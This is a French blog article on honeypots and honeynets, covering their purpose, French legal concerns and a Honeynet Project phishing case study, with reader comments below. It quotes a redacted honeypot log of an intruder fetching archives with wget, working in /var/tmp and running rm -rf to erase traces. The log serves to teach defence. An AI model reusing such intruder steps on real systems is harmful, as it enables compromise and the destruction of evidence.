Accueil » Outils » Les Honeypots : des pièges à pirates

On n’en entend pas souvent parler, mais les honeypots (pots de miel en français) sont des pièges à pirates qui remontent déjà d’il y a plus de dix années.

Un honeypot est un concept mis au point par des experts en sécurité informatique dont le but n’est pas d’empêcher les pirates d’entrer sur leurs systèmes, mais au contraire de les piéger lorsqu’ils viennent. Et donc d’étudier leur comportement pour mieux s’en protéger, en plus de leur restreindre l’accès à tout le système en production.

Ces mêmes honeypots ne sont pas utilisés et utilisables par n’importe qui dans le sens où ils impliquent un contact avec un attaquant réel et déterminé. Ce n’est pas le seul risque dû à leur utilisation, on en parlera plus tard.

Le but de cet article est d’aller plus loin que de juste présenter les honeypots, en observant un cas concret d’attaque repérée.

honeypot

Comment fonctionnent les honeypots ?

À la base, le but n’est pas d’attirer volontairement tous les pirates pour les prendre la main dans le sac, mais plutôt d’étudier leurs méthodes sur le terrain, en toute discrétion.

Le pot de miel doit ainsi être correctement configuré en fonction des attaquants à étudier. Une configuration trop simpliste laissera entrer les script-kiddies et autres logiciels automatisés. Tandis que les attaques plus ciblées dont la méthodologie est la plus intéressante demandent une configuration adaptée.

Un système volontairement vulnérable et ainsi placé dans un environnement contrôlé et surveillé en permanence. L’utilisation des honeypots demande des connaissances pointues non seulement pour analyser les attaques mais aussi pour gérer les problèmes techniques (configurations) et légaux.

 

Les pots de miel, un problème légal ?

Si l’on entend pas beaucoup parler de ces honeypots, c’est notamment car il y a un potentiel problème sur le plan juridique du fait de leur utilisation.

Effectivement, l’article 23 de la loi du 29 juillet 1881 sur la liberté de la presse nous dit que :

Seront punis comme complices d’une action qualifiée crime ou délit ceux qui, soit par des discours, […] soit par tout moyen de communication au public par voie électronique, auront directement provoqué l’auteur ou les auteurs à commettre ladite action, si la provocation a été suivie d’effet.

Ici, le fait de « provoquer à commettre une action » (le piratage) rend complice de cette action.

Il sera donc difficile de se plaindre d’un piratage dans le cas où l’on est complice de celui-ci.

Ce n’est pas le seul problème légal, car le honeypot récupère probablement des données à caractère personnel dont le traitement doit d’abord faire l’objet d’une déclaration à la CNIL.

 

Un cas concret d’attaque par Phishing

Les membres de l’association à but non lucratif The Honeynet Project partagent ce qu’ils ont appris sur les attaques repérées et étudiées sous la forme de rapports visibles à l’adresse suivante :

https://www.honeynet.org/papers

Par exemple, leur étude sur les attaques par Phishing révèle diverses techniques utilisées par les attaquants :

  • Utilisation d’adresses IP au lieu de noms de domaines
  • Utilisation de noms de domaines très similaires (le classique)
  • Tentative de compromettre le navigateur web pour faire apparaître une autre adresse URL
  • Manipuler le fichier hosts sur l’ordinateur de la victime pour faire pointer un nom de domaine vers une autre adresse IP
  • Utiliser un site malveillant comme proxy qui va récupérer les mots de passe entrés dans le formulaire puis les renvoyer vers le site réel
  • …etc

Autant d’informations que l’on connaît déjà et qui ne fonctionnent probablement plus (le rapport date un peu), mais qui peuvent aisément permettre de détecter d’autres techniques encore jamais vues auparavant.

La quantité massive d’information à traiter posant quelques problèmes, un script appelé honeysnap a été créé, dont le but est de faire ressortir rapidement les informations intéressantes sur les activités du pirate.

Un exemple a été placé à l’adresse suivante :

http://old.honeynet.org/papers/phishing/examples/honeysnap_sample1.txt

On y voit par exemple l’attaquant télécharger des archives contenant probablement des fichiers malveillants. On le voit également placer des archives dans le dossier temporaire du système sur lequel il est entré, et même supprimer des traces (les adresses IP et sites de l’attaquant ont été édités) :

25815 2004-08-02 20:22:53.337162 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/psy.tgz HTTP/1.0
27077 2004-08-02 20:37:13.767699 10.2.1.146 -> 213.218.XXX.XXX HTTP GET /Arhive/pico.tgz HTTP/1.0
[...]
[2004-08-02 19:11:41 10.2.1.146 26994 bash 0]w[BS]cd /var/tmp
[2004-08-02 19:11:42 10.2.1.146 26994 bash 0]ls
[2004-08-02 19:12:04 10.2.1.146 26994 bash 0]c[BS]ww[BS]get XXX[BS].com/Arhv[BS]ive/[BS][BS][BS][BS][BS][BS]hive/socklist.tgz 
[2004-08-02 19:18:10 10.2.1.146 26994 bash 0]tar v
[...]
[2004-08-02 19:30:34  10.2.1.146 26994 bash 0]rm -rf *z
[2004-08-02 19:30:36  10.2.1.146 26994 bash 0]rm -rf p
[2004-08-02 19:30:38  10.2.1.146 26994 bash 0]rm -rf p.c

(NDLR: [BS] signifie « BackSpace », l’attaquant appuie ainsi sur la touche « retour en arrière » pour se corriger)

Cet exemple nous permet ici de découvrir, grâce au honeypot, la méthodologie de l’attaquant une fois entré dans le système.

 

Du pot de miel au réseau de miel

Comme l’indique l’article dans la Revue de l’IT qui en parle :

« Pour rendre le piège plus discret, il est possible de créer un réseau de pots de miel ou honeynet »

Un honeynet (réseau de miel) est un ensemble d’honeypots. Le réseau en question n’étant pas un système en production, il n’y a aucune activité de base à part des activités potentiellement malveillantes initiées par des pirates.

Le but principal du honeynet est de récupérer des informations sur les menaces. Ces informations peuvent servir dans le milieu académique à des fins de recherches, ou au sein d’entreprises de sécurité pour créer des solutions antivirus efficaces ainsi que des signature pour les systèmes de détection d’intrusion.

 

Le mot de la fin

Je conclurai avec des pistes supplémentaires :

Il n’existe pas que des honeypots systèmes mais aussi des honeypots sur smartphones ainsi que divers projets entrepris dans le domaine.

Je vous laisse les liens :

Et vous, que pensez-vous des honeypots ? Bonne ou mauvaise idée ? N’hésitez pas à contribuer si vous avez quelque chose à ajouter 😉

7 Commentaires

  1. Bonjour,

    Article très intéressant comme toujours qui laisse la porte ouverte à une multitude de discussions sur le sujet 🙂

    Les Honeyspots sont très connus des services d’administration sécurité réseau. A vrai dire je crois que la grande majorité de ces attaquants savent déjà chez qui ils vont s’attaquer. Ils préféreront s’attaquer à des infrastructures réseau de petites tailles. Il faut savoir que les moyennes et grandes structures possèdent généralement toute une panoplie de système de sécurité en amont, le plus souvent virtualisée, pour justement cloisonner et centraliser leur logs (journaux d’événements etc.) sur des serveurs sécurisés isolés.

    Le « pirate » qui croit avoir effacer ses traces se trompent ! 🙂 Le but de ce type d’analyse comportemental est de détecter en amont ce genre d’intrusion pour ensuite la juguler en interne.

    Dans l’exemple qui a été donné ici, il faut comprendre que de telle requête du style « HTTP GET /Arhive/pico.tgz HTTP/1.0 » a forcément été initié et autorisé volontairement par l’Administrateur Systèmes et réseau de l’infrastructure, car nous savons que l’accès par le biais d’un interface style WebREST en HTTP ne peut en réalité se faire quà partir d’une session ayant les droits requis sur un port d’écoute bien spécifique en interne puisqu’elle est d’office verrouillée côté WAN vers LAN (pour faire simple). De plus l’intégration d’un moteur de recherche et d’indexation en interne sur ce genre de configuration génère automatiquement des alertes fonction de règles préétablies via un pare feu physyque (type Juniper ou autre) couplé à des serveurs dédiés du style Negios ou Graylog fonctionnant sur la pile « ELK ».

    Le niveau de sécurité et de puissance du socle matériel et logiciel de telle infrastructure est aujourd’hui suffisant pour absorber toute charge d’attaque malveillante et exécuter des réponses appropriées…

    Malheureusement il existe un grand nombre d’infrastructure en France notamment qui n’ont pas pris la mesure de l’enjeu sécurité pour des raisons économiques et financières, et souvent par négligence…

    Le gros souci aujourd’hui est l’activité d’infogérance qui s’est auto proclamée « Reine » de la supervision réseau, du Support et de la Sécurité. Ce qui a pour effet de faire croire à leurs clients que tout va bien, « on gère »! Oh que non !! 🙂

    • Merci Diki ! C’est très bien dit. Effectivement le pirate pourra y effectuer des actions qui ne sont en théorie pas faisables, l’idée étant bien de détecter et d’analyser un comportement précis. En l’occurrence ici il s’agit d’observer ses méthodes une fois entré dans le système.

      • Bonjour Michel,

        Sur le ton de l’humour j’ai une anecdote à partager au sujet du « comportemental » 🙂

        Sans rentrer dans le détails de l’affaire, un beau matin j’arrive à mon poste tout content pour enfin démarrer une phase de test d’un projet pilote tournant autour d’un centralisateur de logs que j’avais mis en place au terme d’un effort harassant ! 🙂

        Un nouveau support (Infogérance) avait pris la main au 1er janvier 2016 sur cette infrastructure réseau.

        Quelle fut ma surprise ! J’ai pu détecter à la volée (logs) des demandes de connexion en échec sur certains serveurs. Bingo ! C’était un technicien de ce Support qui tentait de se connecter en vain 🙂

        Le truc c’est qu’il n’avait pas à se connecter puisque toute activité de support doit suivre une procédure bien précise (sécurité oblige).

        En réalité, c’est la « curiosité viscérale » de ce technicien qui était la source de cette « anomalie ». Nous revenons toujours à ce fameux facteur humain qui est très souvent à l’origine de beaucoup de problèmes de sécurité… Par nature, l’humain cherchera à s’aventurer toujours plus loin dans le but de défier les lois imposées par l’Homme… ! 🙂

        En conclusion, la première priorité d’une Administration Sécurité Systèmes et Réseau est de protéger et sécuriser son infrastructure de tout acte malveillant ou accidentel provenant de l’intérieur…

  2. Faut-il faire appel à l’intelligence artificielle pour faire face au facteur humain dans la sécurité informatique ? Que peut-on déléguer comme responsabilité à l’humain tant qu’il ne sait pas respecter une éthique? L’intelligence artificielle développera-t-elle la curiosité viscérale qui devient perversion quand elle agit par rapport à des motivations affectives: volonté de domination, de défier , d’exhiber…

    • Eh bien je pense que c’est un très bon débat ! L’intelligence artificielle est aussi questionable, et la comparer au facteur humain semble être un sujet d’avenir très intéressant.

  3. Les honeyspot, ce ne sont pas les internautes lambda qui savent de quoi il s’agit. Et c’est tant mieux ainsi puisque c’est un process réservé aux professionnels. Je suis juste étonné de découvrir que la loi puisse qualifier de complicité le fait de piéger le pirate. Et autre chose, il y avait déjà des appareils électroniques en 1881 ?

Laisser un commentaire

Lire plus :
sécuriser Wordpress
Sécuriser WordPress en 5 étapes

Comment Sécuriser Wordpress WordPress est actuellement le système de gestion de contenu (CMS pour Content Management System en anglais) le...

Fermer